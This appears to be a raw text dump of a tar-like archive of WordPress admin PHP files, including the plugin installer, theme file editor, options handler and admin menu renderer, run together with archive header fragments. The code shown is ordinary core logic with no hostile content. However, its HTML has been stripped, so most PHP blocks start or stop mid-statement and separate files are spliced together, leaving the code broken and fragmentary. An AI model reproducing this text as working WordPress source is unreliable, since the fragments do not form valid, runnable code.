set_parentage( $parent_file ); ?>
render_screen_meta(); if ( is_network_admin() ) { /** * Prints network admin screen notices. * * @since 3.1.0 */ do_action( 'network_admin_notices' ); } elseif ( is_user_admin() ) { /** * Prints user admin screen notices. * * @since 3.1.0 */ do_action( 'user_admin_notices' ); } else { /** * Prints admin screen notices. * * @since 3.1.0 */ do_action( 'admin_notices' ); } /** * Prints generic admin screen notices. * * @since 3.1.0 */ do_action( 'all_admin_notices' ); if ( 'options-general.php' === $parent_file ) { require ABSPATH . 'wp-admin/options-head.php'; } plugin-install.php000064400000015724152075237570010245 0ustar00get_pagenum(); if ( ! empty( $_REQUEST['_wp_http_referer'] ) ) { $location = remove_query_arg( '_wp_http_referer', wp_unslash( $_SERVER['REQUEST_URI'] ) ); if ( ! empty( $_REQUEST['paged'] ) ) { $location = add_query_arg( 'paged', (int) $_REQUEST['paged'], $location ); } wp_redirect( $location ); exit; } $wp_list_table->prepare_items(); $total_pages = $wp_list_table->get_pagination_arg( 'total_pages' ); if ( $pagenum > $total_pages && $total_pages > 0 ) { wp_redirect( add_query_arg( 'paged', $total_pages ) ); exit; } // Used in the HTML title tag. $title = __( 'Add Plugins' ); $parent_file = 'plugins.php'; wp_enqueue_script( 'plugin-install' ); if ( 'plugin-information' !== $tab ) { add_thickbox(); } $body_id = $tab; wp_enqueue_script( 'updates' ); /** * Fires before each tab on the Install Plugins screen is loaded. * * The dynamic portion of the hook name, `$tab`, allows for targeting * individual tabs. * * Possible hook names include: * * - `install_plugins_pre_beta` * - `install_plugins_pre_favorites` * - `install_plugins_pre_featured` * - `install_plugins_pre_plugin-information` * - `install_plugins_pre_popular` * - `install_plugins_pre_recommended` * - `install_plugins_pre_search` * - `install_plugins_pre_upload` * * @since 2.7.0 */ do_action( "install_plugins_pre_{$tab}" ); /* * Call the pre upload action on every non-upload plugin installation screen * because the form is always displayed on these screens. */ if ( 'upload' !== $tab ) { /** This action is documented in wp-admin/plugin-install.php */ do_action( 'install_plugins_pre_upload' ); } get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '

' . sprintf( /* translators: %s: https://wordpress.org/plugins/ */ __( 'Plugins hook into WordPress to extend its functionality with custom features. Plugins are developed independently from the core WordPress application by thousands of developers all over the world. All plugins in the official WordPress Plugin Directory are compatible with the license WordPress uses.' ), __( 'https://wordpress.org/plugins/' ) ) . '

' . '

' . __( 'You can find new plugins to install by searching or browsing the directory right here in your own Plugins section.' ) . ' ' . __( 'The search results will be updated as you type.' ) . '

', ) ); get_current_screen()->add_help_tab( array( 'id' => 'adding-plugins', 'title' => __( 'Adding Plugins' ), 'content' => '

' . __( 'If you know what you are looking for, Search is your best bet. The Search screen has options to search the WordPress Plugin Directory for a particular Term, Author, or Tag. You can also search the directory by selecting popular tags. Tags in larger type mean more plugins have been labeled with that tag.' ) . '

' . '

' . __( 'If you just want to get an idea of what’s available, you can browse Featured and Popular plugins by using the links above the plugins list. These sections rotate regularly.' ) . '

' . '

' . __( 'You can also browse a user’s favorite plugins, by using the Favorites link above the plugins list and entering their WordPress.org username.' ) . '

' . '

' . __( 'If you want to install a plugin that you’ve downloaded elsewhere, click the Upload Plugin button above the plugins list. You will be prompted to upload the .zip package, and once uploaded, you can activate the new plugin.' ) . '

', ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Installing Plugins' ) . '

' . '

' . __( 'Support forums' ) . '

' ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter plugins list' ), 'heading_pagination' => __( 'Plugins list navigation' ), 'heading_list' => __( 'Plugins list' ), ) ); /** * WordPress Administration Template Header. */ require_once ABSPATH . 'wp-admin/admin-header.php'; WP_Plugin_Dependencies::initialize(); WP_Plugin_Dependencies::display_admin_notice_for_unmet_dependencies(); WP_Plugin_Dependencies::display_admin_notice_for_circular_dependencies(); ?>
">

%s%s', ( 'upload' === $tab ) ? self_admin_url( 'plugin-install.php' ) : self_admin_url( 'plugin-install.php?tab=upload' ), __( 'Upload Plugin' ), __( 'Browse Plugins' ) ); } ?>
views(); } /** * Fires after the plugins list table in each tab of the Install Plugins screen. * * The dynamic portion of the hook name, `$tab`, allows for targeting * individual tabs. * * Possible hook names include: * * - `install_plugins_beta` * - `install_plugins_favorites` * - `install_plugins_featured` * - `install_plugins_plugin-information` * - `install_plugins_popular` * - `install_plugins_recommended` * - `install_plugins_search` * - `install_plugins_upload` * * @since 2.7.0 * * @param int $paged The current page number of the plugins list table. */ do_action( "install_plugins_{$tab}", $paged ); ?>
' . __( 'Sorry, you are not allowed to edit templates for this site.' ) . '

' ); } // Used in the HTML title tag. $title = __( 'Edit Themes' ); $parent_file = 'themes.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '

' . __( 'You can use the theme file editor to edit the individual CSS and PHP files which make up your theme.' ) . '

' . '

' . __( 'Begin by choosing a theme to edit from the dropdown menu and clicking the Select button. A list then appears of the theme’s template files. Clicking once on any file name causes the file to appear in the large Editor box.' ) . '

' . '

' . __( 'For PHP files, you can use the documentation dropdown to select from functions recognized in that file. Look Up takes you to a web page with reference material about that particular function.' ) . '

' . '

' . __( 'When using a keyboard to navigate:' ) . '

' . '
    ' . '
  • ' . __( 'In the editing area, the Tab key enters a tab character.' ) . '
    • ' . '
  • ' . __( 'To move away from this area, press the Esc key followed by the Tab key.' ) . '
    • ' . '
  • ' . __( 'Screen reader users: when in forms mode, you may need to press the Esc key twice.' ) . '
    • ' . '
' . '

' . __( 'After typing in your edits, click Update File.' ) . '

' . '

' . __( 'Advice: Think very carefully about your site crashing if you are live-editing the theme currently in use.' ) . '

' . '

' . sprintf( /* translators: %s: Link to documentation on child themes. */ __( 'Upgrading to a newer version of the same theme will override changes made here. To avoid this, consider creating a child theme instead.' ), __( 'https://developer.wordpress.org/themes/advanced-topics/child-themes/' ) ) . '

' . ( is_network_admin() ? '

' . __( 'Any edits to files from this screen will be reflected on all sites in the network.' ) . '

' : '' ), ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Theme Development' ) . '

' . '

' . __( 'Documentation on Editing Themes' ) . '

' . '

' . __( 'Documentation on Editing Files' ) . '

' . '

' . __( 'Documentation on Template Tags' ) . '

' . '

' . __( 'Support forums' ) . '

' ); $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; $theme = ! empty( $_REQUEST['theme'] ) ? sanitize_text_field( $_REQUEST['theme'] ) : ''; $file = ! empty( $_REQUEST['file'] ) ? sanitize_text_field( $_REQUEST['file'] ) : ''; $error = ! empty( $_REQUEST['error'] ); if ( $theme ) { $stylesheet = $theme; } else { $stylesheet = get_stylesheet(); } $theme = wp_get_theme( $stylesheet ); if ( ! $theme->exists() ) { wp_die( __( 'The requested theme does not exist.' ) ); } if ( $theme->errors() && 'theme_no_stylesheet' === $theme->errors()->get_error_code() ) { wp_die( __( 'The requested theme does not exist.' ) . ' ' . $theme->errors()->get_error_message() ); } $allowed_files = array(); $style_files = array(); $file_types = wp_get_theme_file_editable_extensions( $theme ); foreach ( $file_types as $type ) { switch ( $type ) { case 'php': $allowed_files += $theme->get_files( 'php', -1 ); break; case 'css': $style_files = $theme->get_files( 'css', -1 ); $allowed_files['style.css'] = $style_files['style.css']; $allowed_files += $style_files; break; default: $allowed_files += $theme->get_files( $type, -1 ); break; } } // Move functions.php and style.css to the top. if ( isset( $allowed_files['functions.php'] ) ) { $allowed_files = array( 'functions.php' => $allowed_files['functions.php'] ) + $allowed_files; } if ( isset( $allowed_files['style.css'] ) ) { $allowed_files = array( 'style.css' => $allowed_files['style.css'] ) + $allowed_files; } if ( empty( $file ) ) { $relative_file = 'style.css'; $file = $allowed_files['style.css']; } else { $relative_file = wp_unslash( $file ); $file = $theme->get_stylesheet_directory() . '/' . $relative_file; } validate_file_to_edit( $file, $allowed_files ); // Handle fallback editing of file when JavaScript is not available. $edit_error = null; $posted_content = null; if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) { $edit_result = wp_edit_theme_plugin_file( wp_unslash( $_POST ) ); if ( is_wp_error( $edit_result ) ) { $edit_error = $edit_result; if ( check_ajax_referer( 'edit-theme_' . $stylesheet . '_' . $relative_file, 'nonce', false ) && isset( $_POST['newcontent'] ) ) { $posted_content = wp_unslash( $_POST['newcontent'] ); } } else { wp_redirect( add_query_arg( array( 'a' => 1, // This means "success" for some reason. 'theme' => $stylesheet, 'file' => $relative_file, ), admin_url( 'theme-editor.php' ) ) ); exit; } } $settings = array( 'codeEditor' => wp_enqueue_code_editor( compact( 'file' ) ), ); wp_enqueue_script( 'wp-theme-plugin-editor' ); wp_add_inline_script( 'wp-theme-plugin-editor', sprintf( 'jQuery( function( $ ) { wp.themePluginEditor.init( $( "#template" ), %s ); } )', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) ); wp_add_inline_script( 'wp-theme-plugin-editor', 'wp.themePluginEditor.themeOrPlugin = "theme";' ); require_once ABSPATH . 'wp-admin/admin-header.php'; update_recently_edited( $file ); if ( ! is_file( $file ) ) { $error = true; } $content = ''; if ( ! empty( $posted_content ) ) { $content = $posted_content; } elseif ( ! $error && filesize( $file ) > 0 ) { $f = fopen( $file, 'r' ); $content = fread( $f, filesize( $file ) ); if ( str_ends_with( $file, '.php' ) ) { $functions = wp_doc_link_parse( $content ); if ( ! empty( $functions ) ) { $docs_select = ''; } } $content = esc_textarea( $content ); } $file_show = array_search( $file, array_filter( $allowed_files ), true ); ?>

'message', 'dismissible' => true, 'additional_classes' => array( 'updated' ), ) ); } elseif ( is_wp_error( $edit_error ) ) { $error_code = esc_html( $edit_error->get_error_message() ? $edit_error->get_error_message() : $edit_error->get_error_code() ); $message = '

' . __( 'There was an error while trying to update the file. You may need to fix something and try updating again.' ) . '

' . $error_code . '
'; wp_admin_notice( $message, array( 'type' => 'error', 'id' => 'message', ) ); } if ( preg_match( '/\.css$/', $file ) ) { if ( ! wp_is_block_theme() && current_user_can( 'customize' ) ) { $message = '

' . __( 'Did you know?' ) . '

' . sprintf( /* translators: %s: Link to add custom CSS section in either the Customizer (classic themes) or Site Editor (block themes). */ __( 'There is no need to change your CSS here — you can edit and live preview CSS changes in the built-in CSS editor.' ), esc_url( add_query_arg( 'autofocus[section]', 'custom_css', admin_url( 'customize.php' ) ) ) ) . '

'; wp_admin_notice( $message, array( 'type' => 'info', 'id' => 'message', ) ); } elseif ( wp_is_block_theme() && current_user_can( 'edit_theme_options' ) ) { $site_editor_url = admin_url( add_query_arg( urlencode_deep( array( 'p' => '/styles', 'section' => '/css', ) ), 'site-editor.php' ) ); $message = '

' . __( 'Did you know?' ) . '

' . sprintf( /* translators: %s: Link to add custom CSS section in either the Customizer (classic themes) or Site Editor (block themes). */ __( 'There is no need to change your CSS here — you can edit and live preview CSS changes in the built-in CSS editor.' ), esc_url( $site_editor_url ) ) . '

'; wp_admin_notice( $message, array( 'type' => 'info', 'id' => 'message', ) ); } if ( file_exists( preg_replace( '/\.css$/', '.min.css', $file ) ) ) { $message = '

' . __( 'There is a minified version of this stylesheet.' ) . '

' . __( 'It is likely that this unminified stylesheet will not be served to visitors.' ) . '

'; wp_admin_notice( $message, array( 'type' => 'warning', 'id' => 'wp-css-min-warning', ) ); } } ?>

get( 'Name' ) === $theme->display( 'Name' ) ) { /* translators: %s: Theme name. */ printf( __( 'Editing %s (active)' ), '' . $theme->display( 'Name' ) . '' ); } else { /* translators: %s: Theme name. */ printf( __( 'Editing %s (inactive)' ), '' . $theme->display( 'Name' ) . '' ); } ?>

' . __( 'File: %s' ) . '', esc_html( $file_show ) ); ?>

errors() ) { wp_admin_notice( '' . __( 'This theme is broken.' ) . ' ' . $theme->errors()->get_error_message(), array( 'additional_classes' => array( 'error' ), ) ); } ?>

    parent() ) : ?>
  • %s', self_admin_url( 'theme-editor.php?theme=' . urlencode( $theme->get_template() ) ), $theme->parent()->display( 'Name' ) ) ); ?>
array( 'error' ), ) ); else : ?>
get_stylesheet() === get_template() ) : $message = ( is_writable( $file ) ) ? '' . __( 'Caution:' ) . ' ' : ''; $message .= __( 'This is a file in your current parent theme.' ); wp_admin_notice( $message, array( 'type' => 'warning', 'additional_classes' => array( 'inline' ), ) ); endif; ?>

Changing File Permissions for more information.' ), __( 'https://developer.wordpress.org/advanced-administration/server/file-permissions/' ) ); ?>


<?php echo esc_attr( $header_alt_text ); ?>

worldwide team of passionate individuals.' ), __( 'https://wordpress.org/about/' ) ); ?>


'; require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; } ?>
' . __( 'You need a higher level of permission.' ) . '' . '

' . __( 'Sorry, you are not allowed to manage options for this site.' ) . '

', 403 ); } // Handle admin email change requests. if ( ! empty( $_GET['adminhash'] ) ) { $new_admin_details = get_option( 'adminhash' ); $redirect = 'options-general.php?updated=false'; if ( is_array( $new_admin_details ) && hash_equals( $new_admin_details['hash'], $_GET['adminhash'] ) && ! empty( $new_admin_details['newemail'] ) ) { update_option( 'admin_email', $new_admin_details['newemail'] ); delete_option( 'adminhash' ); delete_option( 'new_admin_email' ); $redirect = 'options-general.php?updated=true'; } wp_redirect( admin_url( $redirect ) ); exit; } elseif ( ! empty( $_GET['dismiss'] ) && 'new_admin_email' === $_GET['dismiss'] ) { check_admin_referer( 'dismiss-' . get_current_blog_id() . '-new_admin_email' ); delete_option( 'adminhash' ); delete_option( 'new_admin_email' ); wp_redirect( admin_url( 'options-general.php?updated=true' ) ); exit; } if ( is_multisite() && ! current_user_can( 'manage_network_options' ) && 'update' !== $action ) { wp_die( '

' . __( 'You need a higher level of permission.' ) . '

' . '

' . __( 'Sorry, you are not allowed to delete these items.' ) . '

', 403 ); } $allowed_options = array( 'general' => array( 'blogname', 'blogdescription', 'site_icon', 'gmt_offset', 'date_format', 'time_format', 'start_of_week', 'timezone_string', 'WPLANG', 'new_admin_email', ), 'discussion' => array( 'default_pingback_flag', 'default_ping_status', 'default_comment_status', 'comments_notify', 'moderation_notify', 'comment_moderation', 'require_name_email', 'comment_previously_approved', 'comment_max_links', 'moderation_keys', 'disallowed_keys', 'show_avatars', 'avatar_rating', 'avatar_default', 'close_comments_for_old_posts', 'close_comments_days_old', 'thread_comments', 'thread_comments_depth', 'page_comments', 'comments_per_page', 'default_comments_page', 'comment_order', 'comment_registration', 'show_comments_cookies_opt_in', 'wp_notes_notify', ), 'media' => array( 'thumbnail_size_w', 'thumbnail_size_h', 'thumbnail_crop', 'medium_size_w', 'medium_size_h', 'large_size_w', 'large_size_h', 'image_default_size', 'image_default_align', 'image_default_link_type', ), 'reading' => array( 'posts_per_page', 'posts_per_rss', 'rss_use_excerpt', 'show_on_front', 'page_on_front', 'page_for_posts', 'blog_public', ), 'writing' => array( 'default_category', 'default_email_category', 'default_link_category', 'default_post_format', ), ); $allowed_options['misc'] = array(); $allowed_options['options'] = array(); $allowed_options['privacy'] = array(); /** * Filters whether the post-by-email functionality is enabled. * * @since 3.0.0 * * @param bool $enabled Whether post-by-email configuration is enabled. Default true. */ if ( apply_filters( 'enable_post_by_email_configuration', true ) ) { $allowed_options['writing'][] = 'mailserver_url'; $allowed_options['writing'][] = 'mailserver_port'; $allowed_options['writing'][] = 'mailserver_login'; $allowed_options['writing'][] = 'mailserver_pass'; } if ( ! is_utf8_charset() ) { $allowed_options['reading'][] = 'blog_charset'; } if ( get_site_option( 'initial_db_version' ) < 32453 ) { $allowed_options['writing'][] = 'use_smilies'; $allowed_options['writing'][] = 'use_balanceTags'; } if ( ! is_multisite() ) { if ( ! defined( 'WP_SITEURL' ) ) { $allowed_options['general'][] = 'siteurl'; } if ( ! defined( 'WP_HOME' ) ) { $allowed_options['general'][] = 'home'; } $allowed_options['general'][] = 'users_can_register'; $allowed_options['general'][] = 'default_role'; if ( '1' === get_option( 'blog_public' ) ) { $allowed_options['writing'][] = 'ping_sites'; } $allowed_options['media'][] = 'uploads_use_yearmonth_folders'; /* * If upload_url_path is not the default (empty), * or upload_path is not the default ('wp-content/uploads' or empty), * they can be edited, otherwise they're locked. */ if ( get_option( 'upload_url_path' ) || get_option( 'upload_path' ) && 'wp-content/uploads' !== get_option( 'upload_path' ) ) { $allowed_options['media'][] = 'upload_path'; $allowed_options['media'][] = 'upload_url_path'; } } /** * Filters the allowed options list. * * @since 2.7.0 * @deprecated 5.5.0 Use {@see 'allowed_options'} instead. * * @param array $allowed_options The allowed options list. */ $allowed_options = apply_filters_deprecated( 'whitelist_options', array( $allowed_options ), '5.5.0', 'allowed_options', __( 'Please consider writing more inclusive code.' ) ); /** * Filters the allowed options list. * * @since 5.5.0 * * @param array $allowed_options The allowed options list. */ $allowed_options = apply_filters( 'allowed_options', $allowed_options ); if ( 'update' === $action ) { // We are saving settings sent from a settings page. if ( 'options' === $option_page && ! isset( $_POST['option_page'] ) ) { // This is for back compat and will eventually be removed. $unregistered = true; check_admin_referer( 'update-options' ); } else { $unregistered = false; check_admin_referer( $option_page . '-options' ); } if ( ! isset( $allowed_options[ $option_page ] ) ) { wp_die( sprintf( /* translators: %s: The options page name. */ __( 'Error: The %s options page is not in the allowed options list.' ), '' . esc_html( $option_page ) . '' ) ); } if ( 'options' === $option_page ) { if ( is_multisite() && ! current_user_can( 'manage_network_options' ) ) { wp_die( __( 'Sorry, you are not allowed to modify unregistered settings for this site.' ) ); } $options = isset( $_POST['page_options'] ) ? explode( ',', wp_unslash( $_POST['page_options'] ) ) : null; } else { $options = $allowed_options[ $option_page ]; } if ( 'general' === $option_page ) { // Handle custom date/time formats. if ( ! empty( $_POST['date_format'] ) && isset( $_POST['date_format_custom'] ) && '\c\u\s\t\o\m' === wp_unslash( $_POST['date_format'] ) ) { $_POST['date_format'] = $_POST['date_format_custom']; } if ( ! empty( $_POST['time_format'] ) && isset( $_POST['time_format_custom'] ) && '\c\u\s\t\o\m' === wp_unslash( $_POST['time_format'] ) ) { $_POST['time_format'] = $_POST['time_format_custom']; } // Map UTC+- timezones to gmt_offsets and set timezone_string to empty. if ( ! empty( $_POST['timezone_string'] ) && preg_match( '/^UTC[+-]/', $_POST['timezone_string'] ) ) { $_POST['gmt_offset'] = $_POST['timezone_string']; $_POST['gmt_offset'] = preg_replace( '/UTC\+?/', '', $_POST['gmt_offset'] ); $_POST['timezone_string'] = ''; } elseif ( isset( $_POST['timezone_string'] ) && ! in_array( $_POST['timezone_string'], timezone_identifiers_list( DateTimeZone::ALL_WITH_BC ), true ) ) { // Reset to the current value. $current_timezone_string = get_option( 'timezone_string' ); if ( ! empty( $current_timezone_string ) ) { $_POST['timezone_string'] = $current_timezone_string; } else { $_POST['gmt_offset'] = get_option( 'gmt_offset' ); $_POST['timezone_string'] = ''; } add_settings_error( 'general', 'settings_updated', __( 'The timezone you have entered is not valid. Please select a valid timezone.' ), 'error' ); } // Handle translation installation. if ( ! empty( $_POST['WPLANG'] ) && current_user_can( 'install_languages' ) ) { require_once ABSPATH . 'wp-admin/includes/translation-install.php'; if ( wp_can_install_language_pack() ) { $language = wp_download_language_pack( $_POST['WPLANG'] ); if ( $language ) { $_POST['WPLANG'] = $language; } } } } if ( $options ) { $user_language_old = get_user_locale(); foreach ( $options as $option ) { if ( $unregistered ) { _deprecated_argument( 'options.php', '2.7.0', sprintf( /* translators: 1: The option/setting, 2: Documentation URL. */ __( 'The %1$s setting is unregistered. Unregistered settings are deprecated. See documentation on the Settings API.' ), '' . esc_html( $option ) . '', __( 'https://developer.wordpress.org/plugins/settings/settings-api/' ) ) ); } $option = trim( $option ); $value = null; if ( isset( $_POST[ $option ] ) ) { $value = $_POST[ $option ]; if ( ! is_array( $value ) ) { $value = trim( $value ); } $value = wp_unslash( $value ); } update_option( $option, $value ); } /* * Switch translation in case WPLANG was changed. * The global $locale is used in get_locale() which is * used as a fallback in get_user_locale(). */ unset( $GLOBALS['locale'] ); $user_language_new = get_user_locale(); if ( $user_language_old !== $user_language_new ) { load_default_textdomain( $user_language_new ); } } else { add_settings_error( 'general', 'settings_updated', __( 'Settings save failed.' ), 'error' ); } /* * Handle settings errors and return to options page. */ // If no settings errors were registered add a general 'updated' message. if ( ! count( get_settings_errors() ) ) { add_settings_error( 'general', 'settings_updated', __( 'Settings saved.' ), 'success' ); } set_transient( 'settings_errors', get_settings_errors(), 30 ); // 30 seconds. // Redirect back to the settings page that was submitted. $goback = add_query_arg( 'settings-updated', 'true', wp_get_referer() ); wp_redirect( $goback ); exit; } require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

' . __( 'Warning:' ) . ' ' . __( 'This page allows direct access to your site settings. You can break things here. Please be cautious!' ), array( 'type' => 'warning', ) ); ?>
get_results( "SELECT * FROM $wpdb->options ORDER BY option_name" ); foreach ( (array) $options as $option ) : $disabled = false; if ( '' === $option->option_name ) { continue; } if ( 'home' === $option->option_name && defined( 'WP_HOME' ) ) { $disabled = true; } if ( 'siteurl' === $option->option_name && defined( 'WP_SITEURL' ) ) { $disabled = true; } if ( is_serialized( $option->option_value ) ) { if ( is_serialized_string( $option->option_value ) ) { // This is a serialized string, so we should display it. $value = maybe_unserialize( $option->option_value ); $options_to_update[] = $option->option_name; } else { $value = 'SERIALIZED DATA'; $disabled = true; } } else { $value = $option->option_value; $options_to_update[] = $option->option_name; } $class = 'all-options'; if ( $disabled ) { $class .= ' disabled'; } $name = esc_attr( $option->option_name ); ?>
$taxnow ), $sendback ); } if ( 'post' !== get_current_screen()->post_type ) { $sendback = add_query_arg( 'post_type', get_current_screen()->post_type, $sendback ); } wp_redirect( sanitize_url( $sendback ) ); exit; } $tag_ID = absint( $_REQUEST['tag_ID'] ); $tag = get_term( $tag_ID, $taxnow, OBJECT, 'edit' ); if ( ! $tag instanceof WP_Term ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) ); } $tax = get_taxonomy( $tag->taxonomy ); $taxonomy = $tax->name; $title = $tax->labels->edit_item; if ( ! in_array( $taxonomy, get_taxonomies( array( 'show_ui' => true ) ), true ) || ! current_user_can( 'edit_term', $tag->term_id ) ) { wp_die( '

' . __( 'You need a higher level of permission.' ) . '

' . '

' . __( 'Sorry, you are not allowed to edit this item.' ) . '

', 403 ); } $post_type = get_current_screen()->post_type; // Default to the first object_type associated with the taxonomy if no post type was passed. if ( empty( $post_type ) ) { $post_type = reset( $tax->object_type ); } if ( 'post' !== $post_type ) { $parent_file = ( 'attachment' === $post_type ) ? 'upload.php' : "edit.php?post_type=$post_type"; $submenu_file = "edit-tags.php?taxonomy=$taxonomy&post_type=$post_type"; } elseif ( 'link_category' === $taxonomy ) { $parent_file = 'link-manager.php'; $submenu_file = 'edit-tags.php?taxonomy=link_category'; } else { $parent_file = 'edit.php'; $submenu_file = "edit-tags.php?taxonomy=$taxonomy"; } get_current_screen()->set_screen_reader_content( array( 'heading_pagination' => $tax->labels->items_list_navigation, 'heading_list' => $tax->labels->items_list, ) ); wp_enqueue_script( 'admin-tags' ); require_once ABSPATH . 'wp-admin/admin-header.php'; require ABSPATH . 'wp-admin/edit-tag-form.php'; require_once ABSPATH . 'wp-admin/admin-footer.php'; menu-header.php000064400000023513152075237570007470 0ustar00 $item ) { $admin_is_parent = false; $class = array(); $aria_attributes = ''; $aria_hidden = ''; $is_separator = false; if ( $first ) { $class[] = 'wp-first-item'; $first = false; } $submenu_items = array(); if ( ! empty( $submenu[ $item[2] ] ) ) { $class[] = 'wp-has-submenu'; $submenu_items = $submenu[ $item[2] ]; } if ( ( $parent_file && $item[2] === $parent_file ) || ( empty( $typenow ) && $self === $item[2] ) ) { if ( ! empty( $submenu_items ) ) { $class[] = 'wp-has-current-submenu wp-menu-open'; } else { $class[] = 'current'; $aria_attributes .= 'aria-current="page"'; } } else { $class[] = 'wp-not-current-submenu'; if ( ! empty( $submenu_items ) ) { $aria_attributes .= 'data-ariahaspopup'; } } if ( ! empty( $item[4] ) ) { $class[] = esc_attr( $item[4] ); } $class = $class ? ' class="' . implode( ' ', $class ) . '"' : ''; $id = ! empty( $item[5] ) ? ' id="' . preg_replace( '|[^a-zA-Z0-9_:.]|', '-', $item[5] ) . '"' : ''; $img = ''; $img_style = ''; $img_class = ' dashicons-before'; if ( str_contains( $class, 'wp-menu-separator' ) ) { $is_separator = true; } /* * If the string 'none' (previously 'div') is passed instead of a URL, don't output * the default menu image so an icon can be added to div.wp-menu-image as background * with CSS. Dashicons and base64-encoded data:image/svg_xml URIs are also handled * as special cases. */ if ( ! empty( $item[6] ) ) { $img = ''; if ( 'none' === $item[6] || 'div' === $item[6] ) { $img = '
'; } elseif ( str_starts_with( $item[6], 'data:image/svg+xml;base64,' ) ) { $img = '
'; // The value is base64-encoded data, so esc_attr() is used here instead of esc_url(). $img_style = ' style="background-image:url(\'' . esc_attr( $item[6] ) . '\')"'; $img_class = ' svg'; } elseif ( str_starts_with( $item[6], 'dashicons-' ) ) { $img = '
'; $img_class = ' dashicons-before ' . sanitize_html_class( $item[6] ); } } $title = wptexturize( $item[0] ); // Hide separators from screen readers. if ( $is_separator ) { $aria_hidden = ' aria-hidden="true"'; } echo "\n\t"; if ( $is_separator ) { echo '
'; } elseif ( $submenu_as_parent && ! empty( $submenu_items ) ) { $submenu_items = array_values( $submenu_items ); // Re-index. $menu_hook = get_plugin_page_hook( $submenu_items[0][2], $item[2] ); $menu_file = $submenu_items[0][2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $submenu_items[0][2] ) && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! file_exists( ABSPATH . "/wp-admin/$menu_file" ) ) ) { $admin_is_parent = true; echo "
$title
"; } else { echo "\n\t
$title
"; } } elseif ( ! empty( $item[2] ) && current_user_can( $item[1] ) ) { $menu_hook = get_plugin_page_hook( $item[2], 'admin.php' ); $menu_file = $item[2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $item[2] ) && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! file_exists( ABSPATH . "/wp-admin/$menu_file" ) ) ) { $admin_is_parent = true; echo "\n\t
{$item[0]}
"; } else { echo "\n\t
{$item[0]}
"; } } if ( ! empty( $submenu_items ) ) { echo "\n\t
    "; echo ""; $first = true; // 0 = menu_title, 1 = capability, 2 = menu_slug, 3 = page_title, 4 = classes. foreach ( $submenu_items as $sub_key => $sub_item ) { if ( ! current_user_can( $sub_item[1] ) ) { continue; } $class = array(); $aria_attributes = ''; if ( $first ) { $class[] = 'wp-first-item'; $first = false; } $menu_file = $item[2]; $pos = strpos( $menu_file, '?' ); if ( false !== $pos ) { $menu_file = substr( $menu_file, 0, $pos ); } // Handle current for post_type=post|page|foo pages, which won't match $self. $self_type = ! empty( $typenow ) ? $self . '?post_type=' . $typenow : 'nothing'; if ( isset( $submenu_file ) ) { if ( $submenu_file === $sub_item[2] ) { $class[] = 'current'; $aria_attributes .= ' aria-current="page"'; } /* * If plugin_page is set the parent must either match the current page or not physically exist. * This allows plugin pages with the same hook to exist under different parents. */ } elseif ( ( ! isset( $plugin_page ) && $self === $sub_item[2] ) || ( isset( $plugin_page ) && $plugin_page === $sub_item[2] && ( $item[2] === $self_type || $item[2] === $self || file_exists( $menu_file ) === false ) ) ) { $class[] = 'current'; $aria_attributes .= ' aria-current="page"'; } if ( ! empty( $sub_item[4] ) ) { $class[] = esc_attr( $sub_item[4] ); } $class = $class ? ' class="' . implode( ' ', $class ) . '"' : ''; $menu_hook = get_plugin_page_hook( $sub_item[2], $item[2] ); $sub_file = $sub_item[2]; $pos = strpos( $sub_file, '?' ); if ( false !== $pos ) { $sub_file = substr( $sub_file, 0, $pos ); } $title = wptexturize( $sub_item[0] ); if ( ! empty( $menu_hook ) || ( ( 'index.php' !== $sub_item[2] ) && file_exists( WP_PLUGIN_DIR . "/$sub_file" ) && ! file_exists( ABSPATH . "/wp-admin/$sub_file" ) ) ) { // If admin.php is the current page or if the parent exists as a file in the plugins or admin directory. if ( ( ! $admin_is_parent && file_exists( WP_PLUGIN_DIR . "/$menu_file" ) && ! is_dir( WP_PLUGIN_DIR . "/{$item[2]}" ) ) || file_exists( $menu_file ) ) { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), $item[2] ); } else { $sub_item_url = add_query_arg( array( 'page' => $sub_item[2] ), 'admin.php' ); } $sub_item_url = esc_url( $sub_item_url ); echo "$title"; } else { echo "$title"; } } echo '
'; } echo ''; } echo '
  • ' . '
